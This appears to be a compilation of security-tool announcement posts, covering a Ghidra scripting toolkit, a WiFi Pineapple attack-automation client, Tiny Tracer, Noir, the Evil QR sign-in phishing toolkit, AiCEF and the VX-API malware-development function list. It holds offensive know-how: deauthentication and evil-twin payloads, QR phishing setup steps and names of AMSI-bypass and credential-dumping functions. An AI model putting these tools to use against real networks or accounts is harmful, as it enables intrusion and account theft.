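A minimal client sketch using Python's standard xmlrpc module; the server address and port below are placeholders, so adjust them to wherever your Sekiryu instance exposes its API:

import xmlrpc.client

# Placeholder endpoint; adjust host/port to your Sekiryu server configuration
proxy = xmlrpc.client.ServerProxy("http://127.0.0.1:8000")

# send_data()/recv_data() exchange dictionaries with the server;
# request_GPT() takes string data, per the function list above
proxy.send_data({"script": "my_analysis", "status": "started"})
data = proxy.recv_data()
print(data)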

    Use your own scripts

Scripts are saved in the folder /modules/scripts/; you can simply copy your script there. In the ghidra_pilot.py file you can find the following function, which is responsible for running a headless Ghidra script:

def exec_headless(file, script):
    """
    Execute the headless analysis of ghidra
    """
    path = ghidra_path + 'analyzeHeadless'
    # Setting variables
    tmp_folder = "/tmp/out"
    os.mkdir(tmp_folder)
    cmd = ' ' + tmp_folder + ' TMP_DIR -import' + ' ' + file + ' ' + "-postscript " + script + " -deleteProject"

    # Running ghidra with specified file and script
    try:
        p = subprocess.run([str(path + cmd)], shell=True, capture_output=True)
        os.rmdir(tmp_folder)

    except KeyError as e:
        print(e)
        os.rmdir(tmp_folder)

The usage is pretty straightforward: create your own script, then just add a function in ghidra_pilot.py such as:

def yourfunction(file):
    try:
        # Setting script
        script = "modules/scripts/your_script.py"

        # Start the exec_headless function in a new thread
        thread = threading.Thread(target=exec_headless, args=(file, script))
        thread.start()
        thread.join()
    except Exception as e:
        print(str(e))

The file cli.py is responsible for the command-line interface and allows you to add an argument and its associated command like this:

    analysis_parser.add_argument('[-ShortCMD]', '[--LongCMD]', help="Your Help Message", action="store_true")

    Contributions

• Scripts/SCRIPTS/SCRIIIIIPTS: This tool is designed to be a toolkit allowing users to save and run their own scripts easily, so contributions of any sort of script are welcome (anything that is interesting will be approved!)
• Optimization: Any kind of optimization is welcome and will almost automatically be approved and deployed every release; some nice areas would be improved parallel tasking, code cleaning and overall improvements.
• Malware analysis: It's a big part, which I'm not familiar with. Any malware analyst willing to contribute can suggest ideas, scripts, or even commit code directly to the project.
• Reporting: I'm no data visualization engineer; if anyone is willing to improve or contribute to this part, it'll be very nice.

    Warning

The xmlrpc.server module is not secure against maliciously constructed data. If you need to parse untrusted or unauthenticated data, see XML vulnerabilities.

    Special thanks

A lot of people encouraged me to push further on this tool and improve it. Without you all, this project wouldn't have been the same, so it's time for a proper shout-out:
    - @JeanBedoul @McProustinet @MilCashh @Aspeak @mrjay @Esbee|sandboxescaper @Rosen @Cyb3rops @RussianPanda @Dr4k0nia
    - @Inversecos @Vs1m @djinn @corelanc0d3r @ramishaath @chompie1337
    Thanks for your feedback, support, encouragement, test, ideas, time and care.

    For more information about Bushido Security, please visit our website: https://www.bushido-sec.com/.



    WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API

    By: Zion3R


    PINEAPPLE MARK VII REST CLIENT

    Author:: TW-D

    Version:: 1.3.7

    Copyright:: Copyright (c) 2022 TW-D

    License:: Distributes under the same terms as Ruby

    Doc:: https://hak5.github.io/mk7-docs/docs/rest/rest/

    Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable

    Installation (Debian, Ubuntu, Raspbian)::

    • sudo apt-get install build-essential curl g++ ruby ruby-dev

    • sudo gem install net-ssh rest-client tty-progressbar

    Description

    Library allowing the automation of active or passive attack operations.

    Note : "Issues" and "Pull Request" are welcome.


    Payloads

    In "./payloads/" directory, you will find :

COMMAND and CONTROL:
• Hak5 Key Croc - Real-time recovery of keystrokes from a keyboard | Author: TW-D | Usage: ruby ./hak5_key-croc.rb
• Maltronics WiFi Deauther - Spam beacon frames | Author: TW-D | Usage: ruby ./maltronics_wifi-deauther.rb

DEFENSE:
• Hak5 Pineapple Spotter | Author: TW-D, with special thanks to @DrSKiZZ, @cribb-it, @barry99705 and @dark_pyrro | Usage: ruby ./hak5-pineapple_spotter.rb

DoS:
• Deauthentication of clients available on the access points | Author: TW-D | Usage: ruby ./deauthentication-clients.rb

EXPLOITATION:
• Evil WPA Access Point | Author: TW-D | Usage: ruby ./evil-wpa_access-point.rb
• Fake Access Points | Author: TW-D | Usage: ruby ./fake_access-points.rb
• Mass Handshakes | Author: TW-D | Usage: ruby ./mass-handshakes.rb
• Rogue Access Points | Author: TW-D | Usage: ruby ./rogue_access-points.rb
• Twin Access Points | Author: TW-D | Usage: ruby ./twin_access-points.rb

GENERAL:
• System Status, Disk Usage, ... | Author: TW-D | Usage: ruby ./dashboard-stats.rb
• Networking Interfaces | Author: TW-D | Usage: ruby ./networking-interfaces.rb
• System Logs | Author: TW-D | Usage: ruby ./system-logs.rb

RECON:
• Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter) | Author: TW-D | Usage: ruby ./access-points_clients_5ghz.rb
• Access Points and Clients | Author: TW-D | Usage: ruby ./access-points_clients.rb
• MAC Addresses of Access Points | Author: TW-D | Usage: ruby ./access-points_mac-addresses.rb
• Tagged Parameters of Access Points | Author: TW-D | Usage: ruby ./access-points_tagged-parameters.rb
• Access Points and Wireless Network Mapping with WiGLE | Author: TW-D | Usage: ruby ./access-points_wigle.rb
• MAC Addresses of Clients | Author: TW-D | Usage: ruby ./clients_mac-addresses.rb
• OPEN Access Points | Author: TW-D | Usage: ruby ./open_access-points.rb
• WEP Access Points | Author: TW-D | Usage: ruby ./wep_access-points.rb
• WPA Access Points | Author: TW-D | Usage: ruby ./wpa_access-points.rb
• WPA2 Access Points | Author: TW-D | Usage: ruby ./wpa2_access-points.rb
• WPA3 Access Points | Author: TW-D | Usage: ruby ./wpa3_access-points.rb

WARDRIVING:
• Continuous Recon on 2.4GHz and 5GHz (with a supported adapter) | Author: TW-D | Usage: ruby ./continuous-recon_5ghz.rb [CTRL+c]
• Continuous Recon for Handshakes Capture | Author: TW-D | Usage: ruby ./continuous-recon_handshakes.rb [CTRL+c]
• Continuous Recon | Author: TW-D | Usage: ruby ./continuous-recon.rb [CTRL+c]

    Payload skeleton for development

    #
    # Title: <TITLE>
    #
    # Description: <DESCRIPTION>
    #
    #
    # Author: <AUTHOR>
    # Version: <VERSION>
    # Category: <CATEGORY>
    #
    # STATUS
    # ======================
    # <SHORT-DESCRIPTION> ... SETUP
    # <SHORT-DESCRIPTION> ... ATTACK
    # <SHORT-DESCRIPTION> ... SPECIAL
    # <SHORT-DESCRIPTION> ... FINISH
    # <SHORT-DESCRIPTION> ... CLEANUP
    # <SHORT-DESCRIPTION> ... OFF
    #

    require_relative('<PATH-TO>/classes/PineappleMK7.rb')

    system_authentication = PineappleMK7::System::Authentication.new
    system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"
    system_authentication.port = 1471
    system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
    system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"

if (system_authentication.login)

  led = PineappleMK7::System::LED.new

  # SETUP
  #
  led.setup

  #
  # [...]
  #

  # ATTACK
  #
  led.attack

  #
  # [...]
  #

  # SPECIAL
  #
  led.special

  #
  # [...]
  #

  # FINISH
  #
  led.finish

  #
  # [...]
  #

  # CLEANUP
  #
  led.cleanup

  #
  # [...]
  #

  # OFF
  #
  led.off

end

Note: Don't hesitate to take inspiration from the payloads directory.

    System modules

    Authentication accessors/method

    system_authentication = PineappleMK7::System::Authentication.new

    system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"
    system_authentication.port = (integer) 1471
    system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
    system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"

    system_authentication.login()

    LED methods

    led = PineappleMK7::System::LED.new

    led.setup()
    led.failed()
    led.attack()
    led.special()
    led.cleanup()
    led.finish()
    led.off()

    Pineapple Modules

    Dashboard

    Notifications method

    dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new

    dashboard_notifications.clear()

    Stats method

    dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new

    dashboard_stats.output()

    Logging

    System method

    logging_system = PineappleMK7::Modules::Logging::System.new

    logging_system.output()

    PineAP

    Clients methods

    pineap_clients = PineappleMK7::Modules::PineAP::Clients.new

    pineap_clients.connected_clients()
    pineap_clients.previous_clients()
    pineap_clients.kick( (string) mac )
    pineap_clients.clear_previous()

    EvilWPA accessors/method

    evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new

    evil_wpa.ssid = (string default:'PineAP_WPA')
    evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
    evil_wpa.auth = (string default:'psk2+ccmp')
    evil_wpa.password = (string default:'pineapplesareyummy')
    evil_wpa.hidden = (boolean default:false)
    evil_wpa.enabled = (boolean default:false)
    evil_wpa.capture_handshakes = (boolean default:false)

    evil_wpa.save()

    Filtering methods

    pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new

    pineap_filtering.client_filter( (string) 'allow' | 'deny' )
    pineap_filtering.add_client( (string) mac )
    pineap_filtering.clear_clients()
    pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )

    Impersonation methods

    pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new

    pineap_impersonation.output()
    pineap_impersonation.add_ssid( (string) ssid )
    pineap_impersonation.clear_pool()

    OpenAP method

    open_ap = PineappleMK7::Modules::PineAP::OpenAP.new

    open_ap.output()

    Settings accessors/method

    pineap_settings = PineappleMK7::Modules::PineAP::Settings.new

    pineap_settings.enablePineAP = (boolean default:true)
    pineap_settings.autostartPineAP = (boolean default:true)
    pineap_settings.armedPineAP = (boolean default:false)
    pineap_settings.ap_channel = (string default:'11')
    pineap_settings.karma = (boolean default:false)
    pineap_settings.logging = (boolean default:false)
    pineap_settings.connect_notifications = (boolean default:false)
    pineap_settings.disconnect_notifications = (boolean default:false)
    pineap_settings.capture_ssids = (boolean default:false)
    pineap_settings.beacon_responses = (boolean default:false)
    pineap_settings.broadcast_ssid_pool = (boolean default:false)
    pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
    pineap_settings.pineap_mac = (string default:system_authentication.mac)
pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')
pineap_settings.beacon_response_interval = (string default:'NORMAL')
pineap_settings.beacon_interval = (string default:'NORMAL')

    pineap_settings.save()

    Recon

    Handshakes methods

    recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new

    recon_handshakes.start( (object) ap )
    recon_handshakes.stop()
    recon_handshakes.output()
    recon_handshakes.download( (object) handshake, (string) destination )
    recon_handshakes.clear()

    Scanning methods

    recon_scanning = PineappleMK7::Modules::Recon::Scanning.new

    recon_scanning.start( (integer) scan_time )
    recon_scanning.start_continuous( (boolean) autoHandshake )
    recon_scanning.stop_continuous()
    recon_scanning.output( (integer) scanID )
    recon_scanning.tags( (object) ap )
    recon_scanning.deauth_ap( (object) ap )
    recon_scanning.delete( (integer) scanID )

    Settings

    Networking methods

    settings_networking = PineappleMK7::Modules::Settings::Networking.new

    settings_networking.interfaces()
    settings_networking.client_scan( (string) interface )
    settings_networking.client_connect( (object) network, (string) interface )
    settings_networking.client_disconnect( (string) interface )
    settings_networking.recon_interface( (string) interface )


    Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

    By: Zion3R


    A Pin Tool for tracing:


    Bypasses the anti-tracing check based on RDTSC.

    Generates a report in a .tag format (which can be loaded into other analysis tools):

    RVA;traced event

e.g.:

    345c2;section: .text
    58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
    3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
    398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
    3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
    49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
    ...
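
Because the .tag format is just one RVA;traced event pair per line, it is trivial to post-process; a small Python sketch that parses a report into (RVA, event) pairs:

def parse_tag_file(path):
    """Parse a Tiny Tracer .tag report into (rva, event) pairs."""
    events = []
    with open(path) as f:
        for line in f:
            line = line.strip()
            if ";" not in line:
                continue  # skip blanks and malformed lines
            rva, event = line.split(";", 1)
            events.append((int(rva, 16), event))
    return events

for rva, event in parse_tag_file("traced.tag"):
    print(f"{rva:#x}: {event}")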

    How to build

    On Windows

To compile the prepared project you need to use Visual Studio >= 2012. It was tested with Intel Pin 3.28.
Clone this repo into \source\tools inside your Pin root directory. Open the project in Visual Studio and build. Detailed description available here.
To build with Intel Pin < 3.26 on Windows, use the appropriate legacy Visual Studio project.

    On Linux

For now, Linux support is experimental, but it is possible to build and use Tiny Tracer on Linux as well. Please refer to tiny_runner.sh for more information. Detailed description available here.

    Usage

Details about the usage can be found on the project's Wiki.

    WARNINGS

    • In order for Pin to work correctly, Kernel Debugging must be DISABLED.
• In install32_64 you can find a utility that checks if Kernel Debugger is disabled (kdb_check.exe, source), and it is used by the Tiny Tracer's .bat scripts. This utility sometimes gets flagged as malware by Windows Defender (it is a known false positive). If you encounter this issue, you may need to exclude the installation directory from Windows Defender scans.
• Since version 3.20, Pin has dropped support for old versions of Windows. If you need to use the tool on Windows < 8, try compiling it with Pin 3.19.


    Questions? Ideas? Join Discussions!



Noir - An Attack Surface Detector From Source Code

    By: Zion3R


Noir is an attack surface detector from source code.

    Key Features

    • Automatically identify language and framework from source code.
    • Find API endpoints and web pages through code analysis.
• Load results quickly through interactions with proxy tools such as ZAP, Burp Suite, Caido and other proxy tools.
• Provides structured data such as JSON and HAR for identified attack surfaces to enable seamless interaction with other tools. Also provides command line samples to easily integrate and collaborate with other tools, such as curl or httpie.

    Available Support Scope

    Endpoint's Entities

    • Path
    • Method
    • Param
    • Header
• Protocol (e.g. ws)

    Languages and Frameworks

Language Framework URL Method Param Header WS
Go Echo X X X
Python Django X X X X
Python Flask X X X X
Ruby Rails X X
Ruby Sinatra X X
Php X X
Java Spring X X X
Java Jsp X X X X X
Crystal Kemal X
JS Express X X X
JS Next X X X X X

    Specification

Specification Format URL Method Param Header WS
Swagger JSON X X
Swagger YAML X X

    Installation

    Homebrew (macOS)

    brew tap hahwul/noir
    brew install noir

    From Sources

    # Install Crystal-lang
    # https://crystal-lang.org/install/

    # Clone this repo
    git clone https://github.com/hahwul/noir
    cd noir

    # Install Dependencies
    shards install

    # Build
    shards build --release --no-debug

    # Copy binary
    cp ./bin/noir /usr/bin/

    Docker (GHCR)

    docker pull ghcr.io/hahwul/noir:main

    Usage

    Usage: noir <flags>
    Basic:
    -b PATH, --base-path ./app (Required) Set base path
    -u URL, --url http://.. Set base url for endpoints
    -s SCOPE, --scope url,param Set scope for detection

    Output:
    -f FORMAT, --format json Set output format [plain/json/markdown-table/curl/httpie]
    -o PATH, --output out.txt Write result to file
    --set-pvalue VALUE Specifies the value of the identified parameter
    --no-color Disable color output
    --no-log Displaying only the results

    Deliver:
    --send-req Send the results to the web request
    --send-proxy http://proxy.. Send the results to the web request via http proxy

    Technologies:
    -t TECHS, --techs rails,php Set technologies to use
    --exclude-techs rails,php Specify the technologies to be excluded
    --list-techs Show all technologies

    Others:
    -d, --debug Show debug messages
    -v, --version Show version
    -h, --help Show help

    Example

    noir -b . -u https://testapp.internal.domains

    JSON Result

    noir -b . -u https://testapp.internal.domains -f json
[
  ...
  {
    "headers": [],
    "method": "POST",
    "params": [
      {
        "name": "article_slug",
        "param_type": "json",
        "value": ""
      },
      {
        "name": "body",
        "param_type": "json",
        "value": ""
      },
      {
        "name": "id",
        "param_type": "json",
        "value": ""
      }
    ],
    "protocol": "http",
    "url": "https://testapp.internal.domains/comments"
  }
]
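
Noir itself can already emit command line samples via -f curl or -f httpie, but the JSON output is easy to consume from your own tooling as well. A small Python sketch that turns an endpoint list like the one above into naive curl command lines (it ignores param_type and headers for brevity):

import json
import sys

# Read noir's JSON output, e.g.: noir -b . -u https://... -f json -o endpoints.json
with open(sys.argv[1]) as f:
    endpoints = json.load(f)

for ep in endpoints:
    cmd = ["curl", "-X", ep["method"], ep["url"]]
    params = {p["name"]: p["value"] for p in ep.get("params", [])}
    if params:
        # Naive: sends every param as a JSON body regardless of its param_type
        cmd += ["-H", "'Content-Type: application/json'", "-d", f"'{json.dumps(params)}'"]
    print(" ".join(cmd))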



    Evil QR - Proof-of-concept To Demonstrate Dynamic QR Swap Phishing Attacks In Practice

    By: Zion3R


Toolkit demonstrating another approach of a QRLJacking attack, allowing an attacker to perform remote account takeover through sign-in QR code phishing.

    It consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.

    Watch the demo video:

    Read more about it on my blog: https://breakdev.org/evilqr-phishing


    Configuration

The parameters used by Evil QR are hardcoded into the extension and server source code, so it is important to change them to custom values before you build and deploy the toolkit.

• API_TOKEN - API token used to authenticate with REST API endpoints hosted on the server (default: 00000000-0000-0000-0000-000000000000)
• QRCODE_ID - QR code ID used to bind the extracted QR code with the one displayed on the phishing page (default: 11111111-1111-1111-1111-111111111111)
• BIND_ADDRESS - IP address with port the HTTP server will be listening on (default: 127.0.0.1:35000)
• API_URL - External URL pointing to the server, where the phishing page will be hosted (default: http://127.0.0.1:35000)

Here are all the places in the source code where the values should be modified:

• server/core/config.go
• server/templates/index.html
• extension/background.js

    Installation

    Extension

    You can load the extension in Chrome, through Load unpacked feature: https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

    Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.

    Server

Make sure you have Go installed, version at least 1.20.

To build, go to the /server directory and run the command:

    Windows:

    build_run.bat

    Linux:

    chmod 700 build.sh
    ./build.sh

    Built server binaries will be placed in the ./build/ directory.

    Usage

1. Run the server by running the built server binary: ./server/build/evilqr-server
2. Open any of the supported websites in your Chrome browser, with the Evil QR extension installed:
https://discord.com/login
https://web.telegram.org/k/
https://whatsapp.com
https://store.steampowered.com/login/
https://accounts.binance.com/en/login
https://www.tiktok.com/login
3. Make sure the sign-in QR code is visible and click the Evil QR extension icon in the toolbar. If the QR code is recognized, the icon should light up with colors.
4. Open the server's phishing page URL: http://127.0.0.1:35000 (default)

    License

    Evil QR is made by Kuba Gretzky (@mrgretzky) and it's released under MIT license.



    AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

    By: Zion3R


AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities and arsenal (e.g. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

    We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.


    Problems an Exercise Planner faces:

    • Constant table-top research to have fresh content
    • Realistic CSE scenario creation can be difficult and time-consuming
    • Meeting objectives but also keeping it appealing for the target audience
• Are the relevance and timeliness aspects considered?
    • Can all the above be automated?

    Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

    Release Roadmap

The updated project, AiCEF v2.0, is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functionality will start being released by early June 2023. Thank you for your patience.

    Installation

The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise deploying MySQL manually in a dedicated environment and then starting the other components using Docker.

    First, make sure you have docker-compose installed in your environment:

    Linux:

    $ sudo apt-get install docker-compose

    Then, clone the repository:

    $ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
    $ cd /<choose-a-path>/AiCEF-docker

    Configure the environment settings

Import the MySQL file into your database:

$ mysql -u <your_username> --password=<your_password> AiCEF_db < AiCEF_db.sql

    Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

    $ cp .env.sample .env

    Run AiCEF

Note: Make sure you have an OpenAI API key available. Load the environment settings (including your MySQL connection details):

    set -a ; source .env

    Finally, run docker-compose in detached (-d) mode:

    $ sudo docker-compose up -d

    Usage

A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using the MLTP module, and storing them in a knowledge database called KDB. Incidents are then generated using the IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using the APT Enhancer, i.e. by using the activity of known APT groups from MITRE, or manually.

    Find below some sample usage screenshots:

    Features

    • An AI-powered Cyber Exercise Generation Framework
    • Developed in Python & EEL
    • Open source library Stixview
• Stores data in MySQL
• API to Text Synthesis Models (e.g. GPT-3.5)
• Can create incidents based on TTPs of 125 known APT actors
• Models Cyber Exercise Content in machine-readable STIX2.1 [2] (.json) and human-readable format (.pdf)

    Authors

    AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

    References

    [1] https://link.springer.com/article/10.1007/s10207-023-00693-z

    [2] https://oasis-open.github.io/cti-documentation/stix/intro.html

    Contributing

    Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

    1. Fork this repository
    2. Create a new branch (git checkout -b feature/your-branch-name)
    3. Make your changes and commit them (git commit -m 'Add some feature')
    4. Push to the branch (git push origin feature/your-branch-name)
    5. Open a new pull request

    License

AiCEF is licensed under the Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See https://creativecommons.org/licenses/by-nc/4.0/ for more information.

    Under the following terms:

Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
NonCommercial — You may not use the material for commercial purposes.
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



    VX-API - Collection Of Various Malicious Functionality To Aid In Malware Development

    By: Zion3R



The VX-API is a collection of malicious functionality to aid in malware development. It is recommended that you clone and/or download this entire repo, then open the Visual Studio solution file to easily explore functionality and concepts.

    Some functions may be dependent on other functions present within the solution file. Using the solution file provided here will make it easier to identify which other functionality and/or header data is required.

You're free to use this in any manner you please. You do not need to use this entire solution for your malware proof-of-concepts or Red Team engagements. Strip, copy, paste, delete, or edit this project's contents as much as you'd like.


    List of features

    Anti-debug

    Function Name Original Author
    AdfCloseHandleOnInvalidAddress Checkpoint Research
    AdfIsCreateProcessDebugEventCodeSet Checkpoint Research
    AdfOpenProcessOnCsrss Checkpoint Research
    CheckRemoteDebuggerPresent2 ReactOS
    IsDebuggerPresentEx smelly__vx
    IsIntelHardwareBreakpointPresent Checkpoint Research

    Cryptography Related

    Function Name Original Author
    HashStringDjb2 Dan Bernstein
    HashStringFowlerNollVoVariant1a Glenn Fowler, Landon Curt Noll, and Kiem-Phong Vo
    HashStringJenkinsOneAtATime32Bit Bob Jenkins
    HashStringLoseLose Brian Kernighan and Dennis Ritchie
    HashStringRotr32 T. Oshiba (1972)
    HashStringSdbm Ozan Yigit
    HashStringSuperFastHash Paul Hsieh
    HashStringUnknownGenericHash1A Unknown
    HashStringSipHash RistBS
    HashStringMurmur RistBS
    CreateMd5HashFromFilePath Microsoft
    CreatePseudoRandomInteger Apple (c) 1999
    CreatePseudoRandomString smelly__vx
    HashFileByMsiFileHashTable smelly__vx
    CreatePseudoRandomIntegerFromNtdll smelly__vx
    LzMaximumCompressBuffer smelly__vx
    LzMaximumDecompressBuffer smelly__vx
    LzStandardCompressBuffer smelly__vx
    LzStandardDecompressBuffer smelly__vx
    XpressHuffMaximumCompressBuffer smelly__vx
    XpressHuffMaximumDecompressBuffer smelly__vx
    XpressHuffStandardCompressBuffer smelly__vx
    XpressHuffStandardDecompressBuffer smelly__vx
    XpressMaximumCompressBuffer smelly__vx
    XpressMaximumDecompressBuffer smelly__vx
    XpressStandardCompressBuffer smelly__vx
    XpressStandardDecompressBuffer smelly__vx
    ExtractFilesFromCabIntoTarget smelly__vx
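
As an aside, most of the string hashes listed above are classic public algorithms commonly used for API hashing. For reference, a Python sketch of Dan Bernstein's djb2, which HashStringDjb2 is based on (the VX-API implementations themselves are C):

def djb2(s: str) -> int:
    # Dan Bernstein's djb2: h = h * 33 + c, truncated to 32 bits
    h = 5381
    for c in s.encode():
        h = ((h * 33) + c) & 0xFFFFFFFF
    return h

print(hex(djb2("kernel32.dll")))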

    Error Handling

    Function Name Original Author
    GetLastErrorFromTeb smelly__vx
    GetLastNtStatusFromTeb smelly__vx
    RtlNtStatusToDosErrorViaImport ReactOS
    GetLastErrorFromTeb smelly__vx
    SetLastErrorInTeb smelly__vx
    SetLastNtStatusInTeb smelly__vx
    Win32FromHResult Raymond Chen

    Evasion

    Function Name Original Author
    AmsiBypassViaPatternScan ZeroMemoryEx
    DelayedExecutionExecuteOnDisplayOff am0nsec and smelly__vx
    HookEngineRestoreHeapFree rad9800
    MasqueradePebAsExplorer smelly__vx
    RemoveDllFromPeb rad9800
    RemoveRegisterDllNotification Rad98, Peter Winter-Smith
    SleepObfuscationViaVirtualProtect 5pider
    RtlSetBaseUnicodeCommandLine TheWover

    Fingerprinting

    Function Name Original Author
    GetCurrentLocaleFromTeb 3xp0rt
    GetNumberOfLinkedDlls smelly__vx
    GetOsBuildNumberFromPeb smelly__vx
    GetOsMajorVersionFromPeb smelly__vx
    GetOsMinorVersionFromPeb smelly__vx
    GetOsPlatformIdFromPeb smelly__vx
    IsNvidiaGraphicsCardPresent smelly__vx
    IsProcessRunning smelly__vx
    IsProcessRunningAsAdmin Vimal Shekar
    GetPidFromNtQuerySystemInformation smelly__vx
    GetPidFromWindowsTerminalService modexp
    GetPidFromWmiComInterface aalimian and modexp
    GetPidFromEnumProcesses smelly__vx
    GetPidFromPidBruteForcing modexp
    GetPidFromNtQueryFileInformation modexp, Lloyd Davies, Jonas Lyk
GetPidFromPidBruteForcingExW smelly__vx, Lloyd Davies, Jonas Lyk, modexp

    Helper Functions

    Function Name Original Author
    CreateLocalAppDataObjectPath smelly__vx
    CreateWindowsObjectPath smelly__vx
    GetCurrentDirectoryFromUserProcessParameters smelly__vx
    GetCurrentProcessIdFromTeb ReactOS
    GetCurrentUserSid Giovanni Dicanio
    GetCurrentWindowTextFromUserProcessParameter smelly__vx
    GetFileSizeFromPath smelly__vx
    GetProcessHeapFromTeb smelly__vx
    GetProcessPathFromLoaderLoadModule smelly__vx
    GetProcessPathFromUserProcessParameters smelly__vx
    GetSystemWindowsDirectory Geoff Chappell
    IsPathValid smelly__vx
    RecursiveFindFile Luke
    SetProcessPrivilegeToken Microsoft
    IsDllLoaded smelly__vx
    TryLoadDllMultiMethod smelly__vx
    CreateThreadAndWaitForCompletion smelly__vx
    GetProcessBinaryNameFromHwndW smelly__vx
    GetByteArrayFromFile smelly__vx
    Ex_GetHandleOnDeviceHttpCommunication x86matthew
    IsRegistryKeyValid smelly__vx
    FastcallExecuteBinaryShellExecuteEx smelly__vx
    GetCurrentProcessIdFromOffset RistBS
    GetPeBaseAddress smelly__vx
    LdrLoadGetProcedureAddress c5pider
    IsPeSection smelly__vx
    AddSectionToPeFile smelly__vx
    WriteDataToPeSection smelly__vx
    GetPeSectionSizeInByte smelly__vx
    ReadDataFromPeSection smelly__vx
    GetCurrentProcessNoForward ReactOS
    GetCurrentThreadNoForward ReactOS

    Library Loading

    Function Name Original Author
    GetKUserSharedData Geoff Chappell
    GetModuleHandleEx2 smelly__vx
    GetPeb 29a
    GetPebFromTeb ReactOS
    GetProcAddress 29a Volume 2, c5pider
    GetProcAddressDjb2 smelly__vx
    GetProcAddressFowlerNollVoVariant1a smelly__vx
    GetProcAddressJenkinsOneAtATime32Bit smelly__vx
    GetProcAddressLoseLose smelly__vx
    GetProcAddressRotr32 smelly__vx
    GetProcAddressSdbm smelly__vx
    GetProcAddressSuperFastHash smelly__vx
    GetProcAddressUnknownGenericHash1 smelly__vx
    GetProcAddressSipHash RistBS
    GetProcAddressMurmur RistBS
    GetRtlUserProcessParameters ReactOS
    GetTeb ReactOS
    RtlLoadPeHeaders smelly__vx
    ProxyWorkItemLoadLibrary Rad98, Peter Winter-Smith
    ProxyRegisterWaitLoadLibrary Rad98, Peter Winter-Smith

    Lsass Dumping

    Function Name Original Author
    MpfGetLsaPidFromServiceManager modexp
    MpfGetLsaPidFromRegistry modexp
    MpfGetLsaPidFromNamedPipe modexp

    Network Connectivity

    Function Name Original Author
    UrlDownloadToFileSynchronous Hans Passant
    ConvertIPv4IpAddressStructureToString smelly__vx
    ConvertIPv4StringToUnsignedLong smelly__vx
    SendIcmpEchoMessageToIPv4Host smelly__vx
    ConvertIPv4IpAddressUnsignedLongToString smelly__vx
    DnsGetDomainNameIPv4AddressAsString smelly__vx
    DnsGetDomainNameIPv4AddressUnsignedLong smelly__vx
    GetDomainNameFromUnsignedLongIPV4Address smelly__vx
    GetDomainNameFromIPV4AddressAsString smelly__vx

    Other

    Function Name Original Author
    OleGetClipboardData Microsoft
    MpfComVssDeleteShadowVolumeBackups am0nsec
    MpfComModifyShortcutTarget Unknown
